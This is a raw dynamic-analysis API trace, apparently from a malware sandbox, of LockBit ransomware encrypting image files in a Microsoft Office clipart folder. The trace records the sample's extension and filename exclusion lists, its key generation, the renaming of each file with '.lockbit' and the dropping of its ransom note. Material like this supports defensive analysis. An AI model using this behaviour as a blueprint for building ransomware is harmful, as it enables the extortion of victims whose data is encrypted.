lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.461] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.462] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.462] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.463] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.463] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02069J.JPG") returned 1 [0168.463] lstrcmpiW (lpString1="ntldr", lpString2="PH02069J.JPG") returned -1 [0168.463] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02069J.JPG") returned -1 [0168.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02069J.JPG") returned -1 [0168.463] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02069J.JPG") returned -1 [0168.463] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02069J.JPG") returned 1 [0168.463] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02069J.JPG") returned -1 [0168.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG") returned=".JPG" [0168.463] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.463] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.463] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.463] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.464] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.464] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.464] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG.lockbit") returned 72 [0168.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02069j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.466] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.466] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.466] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29335) returned 1 [0168.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.467] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0168.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.473] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.473] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.475] free (_Block=0x1fa2ed8) [0168.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.475] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.475] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.475] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67af4100, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67af4100, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02071U.BMP", cAlternateFileName="")) returned 1 [0168.475] lstrcmpiW (lpString1=".", lpString2="PH02071U.BMP") returned -1 [0168.475] lstrcmpiW (lpString1="..", lpString2="PH02071U.BMP") returned -1 [0168.475] PathFindExtensionW (pszPath="PH02071U.BMP") returned=".BMP" [0168.475] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.475] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.475] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.475] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.475] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.475] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.475] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.476] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.476] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.476] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.477] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02071U.BMP") returned 1 [0168.477] lstrcmpiW (lpString1="ntldr", lpString2="PH02071U.BMP") returned -1 [0168.477] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02071U.BMP") returned -1 [0168.477] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02071U.BMP") returned -1 [0168.477] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02071U.BMP") returned -1 [0168.477] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02071U.BMP") returned 1 [0168.477] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02071U.BMP") returned -1 [0168.478] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.478] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP") returned=".BMP" [0168.478] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.478] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.478] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.479] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.479] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP.lockbit") returned 72 [0168.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02071u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.480] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.480] malloc (_Size=0x40068) returned 0x3df0008 [0168.480] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0168.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.481] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.488] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.488] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.489] free (_Block=0x1fa2ed8) [0168.489] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.489] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.489] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55cd9e00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55cd9e00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02074U.BMP", cAlternateFileName="")) returned 1 [0168.489] lstrcmpiW (lpString1=".", lpString2="PH02074U.BMP") returned -1 [0168.489] lstrcmpiW (lpString1="..", lpString2="PH02074U.BMP") returned -1 [0168.489] PathFindExtensionW (pszPath="PH02074U.BMP") returned=".BMP" [0168.489] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.489] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.489] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.489] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.489] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.490] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.490] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.490] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.491] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02074U.BMP") returned 1 [0168.491] lstrcmpiW (lpString1="ntldr", lpString2="PH02074U.BMP") returned -1 [0168.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02074U.BMP") returned -1 [0168.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02074U.BMP") returned -1 [0168.491] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02074U.BMP") returned -1 [0168.492] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02074U.BMP") returned 1 [0168.492] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02074U.BMP") returned -1 [0168.492] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.492] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP") returned=".BMP" [0168.492] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.492] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.492] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.493] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.493] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP.lockbit") returned 72 [0168.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02074u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.499] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.499] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.499] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31968) returned 1 [0168.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.500] BCryptGenRandom (in: 